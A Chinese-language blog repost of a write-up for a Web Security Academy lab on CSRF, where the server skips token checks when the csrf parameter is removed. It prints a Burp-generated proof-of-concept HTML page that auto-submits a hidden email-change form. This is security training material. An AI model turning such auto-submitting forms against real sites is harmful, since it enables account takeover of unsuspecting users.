首页 > 其他 > 详细

Lab: CSRF where token validation depends on token being present:CSRF,其中令牌验证取决于是否存在令牌

时间:2021-08-26 11:32:58      阅读:23      评论:0      收藏:0      [点我收藏+]

CSRF 令牌的验证取决于是否存在令牌
某些应用程序在令牌存在时正确验证令牌,但如果省略令牌则跳过验证。

在这种情况下,攻击者可以移除包含令牌的整个参数(不仅仅是它的值)来绕过验证并发起 CSRF 攻击

将请求发送到 Burp Repeater 并观察,如果您更改csrf参数的值,则该请求将被拒绝。
csrf完全 删除参数并观察请求现在已被接受。
技术分享图片
技术分享图片
技术分享图片

还是那个代码:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState(‘‘, ‘‘, ‘/‘)</script>

    <form action="https://acbf1f301e1e23af807eb7ad00f40004.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="aaa&#64;dontwannacry&#46;com" />
    </form>
<script>
      document.forms[0].submit();
</script>

Lab: CSRF where token validation depends on token being present:CSRF,其中令牌验证取决于是否存在令牌

原文:https://www.cnblogs.com/Zeker62/p/15188485.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!